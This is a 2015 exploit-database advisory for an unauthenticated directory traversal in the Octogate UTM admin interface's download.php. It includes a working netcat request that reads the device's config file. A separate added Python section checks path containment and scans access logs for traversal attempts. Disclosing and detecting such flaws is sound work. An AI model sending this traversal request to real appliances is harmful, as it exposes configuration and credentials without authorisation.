Octogate UTM 3.0.12 - Admin Interface Directory Traversal

Published 10 Sep 2015. Reported by Oliver Karow. Source: exploitdb (www.exploit-db.com)

Octogate UTM 3.0.12 Admin Interface Directory Traversal vulnerability

# Exploit Title: Octogate UTM Admin Interface Directory Traversal
# Date: 26.08.2015
# Software Link: http://www.octogate.com
# Exploit Author: Oliver Karow
# Contact: [email protected]
# Website: http://www.oliverkarow.de
# Category: Remote Exploit


Affected Products/Versions
--------------------------

Product Name: Octogate
Version: 3.0.12 - Virtual Appliance & Appliance


Product/Company Information
---------------------------

Octogate is a UTM device that includes the following features: application
firewall, intrusion detection and prevention, stateful and deep packet
inspection, DoS and DDoS protection, and reverse proxy.

Octogate IT Security Systems GmbH is based in Germany.


Vulnerability Description
-------------------------

The Octogate UTM device is managed via a web interface. The download function
for the SSL certificate and documentation is accessible without
authentication, and allows access to files outside of the web root via
the script /scripts/download.php.

Example request:

echo -en "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0\r\nHost: 192.168.0.177\r\nReferer: http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.177 80
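The request above works because download.php joins the `file` parameter onto its base directory without checking where the resulting path ends up. The following added example (not part of the advisory or of Octogate's code) shows the containment check a fixed download.php would need and runs the same check as a detection rule over constructed access-log lines; the download root and log format are assumptions.

```python
import re
import posixpath
from urllib.parse import urlsplit, parse_qs

# Assumed directory that download.php is meant to serve from (placeholder, not from the advisory).
DOWNLOAD_ROOT = "/var/www/html/downloads"

# Constructed sample access-log lines for demonstration; they are not from the advisory.
SAMPLE_LOG = """\
192.168.0.10 - - [26/Aug/2015:10:01:02 +0200] "GET /scripts/download.php?file=docs/manual.pdf&type=dl HTTP/1.0" 200 5120
192.168.0.50 - - [26/Aug/2015:10:02:15 +0200] "GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl HTTP/1.0" 200 2048
192.168.0.51 - - [26/Aug/2015:10:03:40 +0200] "GET /scripts/download.php?file=%2F..%2F..%2F..%2F..%2F..%2F..%2Focto%2Fetc%2Fini.d%2Foctogate.ini&type=dl HTTP/1.0" 200 2048
192.168.0.10 - - [26/Aug/2015:10:04:00 +0200] "GET /scripts/download.php?file=docs/../docs/cert.pem&type=dl HTTP/1.0" 200 1700
"""

# Common-log-format prefix: client IP, ident, user, timestamp, then the request line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+"')

def resolve(root, file_param):
    """Mimic the unsafe `$root . $file` concatenation and normalise the result
    the way the filesystem will when the file is opened."""
    return posixpath.normpath(root + "/" + file_param)

def escapes_root(root, file_param):
    """True when the resolved path leaves `root`. This is the check a fixed
    download.php must enforce before opening the file, and it doubles as the
    detection rule: naive '..' matching would also flag the harmless
    'docs/../docs/cert.pem', which resolves inside the root."""
    resolved = resolve(root, file_param)
    return not (resolved == root or resolved.startswith(root + "/"))

def scan_log(log_text, root=DOWNLOAD_ROOT):
    """Return (client_ip, decoded_file_param, resolved_path) for every request
    to /scripts/download.php whose `file` parameter escapes the root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if url.path != "/scripts/download.php":
            continue
        # parse_qs percent-decodes once, as the web server and PHP would.
        file_param = parse_qs(url.query).get("file", [""])[0]
        if escapes_root(root, file_param):
            hits.append((ip, file_param, resolve(root, file_param)))
    return hits

if __name__ == "__main__":
    for ip, param, path in scan_log(SAMPLE_LOG):
        print(f"{ip} requested file={param!r} -> would open {path}")
```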

Patch Information
-----------------

Patch is available from vendor.

Advisory Information
--------------------

http://www.oliverkarow.de/research/octogate.txt
